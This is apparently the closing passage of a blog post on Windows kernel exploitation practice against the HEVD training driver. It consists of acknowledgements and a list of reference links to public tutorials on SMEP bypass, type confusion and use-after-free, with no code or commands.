- First of all, thanks to my husband, who held me together when I was stressed, with no clue what to do, and having a lot of nightmares throughout all these months!
- @xct_de
- @gal_kristal
- @33y0re
Hope you enjoyed!
Exploit Link (not so important at all)
References
- https://www.coresecurity.com/sites/default/files/2020-06/Windows%20SMEP%20bypass%20U%20equals%20S_0.pdf
- https://kristal-g.github.io/2021/02/20/HEVD_Type_Confusion_Windows_10_RS5_x64.html
- https://ctf101.org/binary-exploitation/return-oriented-programming/
- https://j00ru.vexillium.org/2011/06/smep-what-is-it-and-how-to-beat-it-on-windows/
- https://www.abatchy.com/2018/01/kernel-exploitation-4
- https://vulndev.io/2022/07/14/windows-kernel-exploitation-hevd-x64-use-after-free/
- https://h0mbre.github.io/HEVD_Stackoverflow_SMEP_Bypass_64bit/
- https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/TypeConfusion.c